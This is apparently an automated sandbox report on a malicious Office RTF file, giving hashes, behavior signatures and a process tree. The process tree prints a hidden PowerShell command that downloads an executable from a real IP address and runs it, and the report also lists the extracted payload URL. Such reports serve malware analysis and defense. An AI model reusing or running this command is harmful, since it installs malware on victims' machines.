Analysis
-
max time kernel
138s -
max time network
141s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
30-06-2020 04:40
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Resource
win10v200430
General
-
Target
SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
-
Size
97KB
-
MD5
340e15c9ee5ae17758bb2e4a7890c0c0
-
SHA1
7bd2df48ad16fe08db23700ab57e781048f9bc76
-
SHA256
894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
-
SHA512
b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6
Malware Config
Extracted
http://185.208.211.67/scorp/Class.sfx.exe
Signatures
-
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
WINWORD.EXEEXCEL.EXEexcelcnv.exepid process 1508 WINWORD.EXE 1508 WINWORD.EXE 1508 WINWORD.EXE 3988 EXCEL.EXE 3988 EXCEL.EXE 3988 EXCEL.EXE 3988 EXCEL.EXE 1112 excelcnv.exe 1508 WINWORD.EXE 1508 WINWORD.EXE 1508 WINWORD.EXE 1508 WINWORD.EXE 1508 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 3988 wrote to memory of 1672 3988 EXCEL.EXE powershell.exe PID 3988 wrote to memory of 1672 3988 EXCEL.EXE powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1672 powershell.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
excelcnv.exeWINWORD.EXEEXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString excelcnv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 excelcnv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz excelcnv.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
EXCEL.EXEexcelcnv.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily excelcnv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS excelcnv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU excelcnv.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1508 WINWORD.EXE 1508 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1672 3988 powershell.exe EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 1508 WINWORD.EXE 1508 WINWORD.EXE -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 18 1672 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')2⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
-
C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
-
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1ACB2710-4DF2-4E17-85A7-B0AE2673A7D9
-
C:\Users\Admin\AppData\Local\Temp\.ses
-
memory/1672-3-0x0000000000000000-mapping.dmp
-
memory/3988-0-0x000001890D4A2000-0x000001890D508000-memory.dmpFilesize
408KB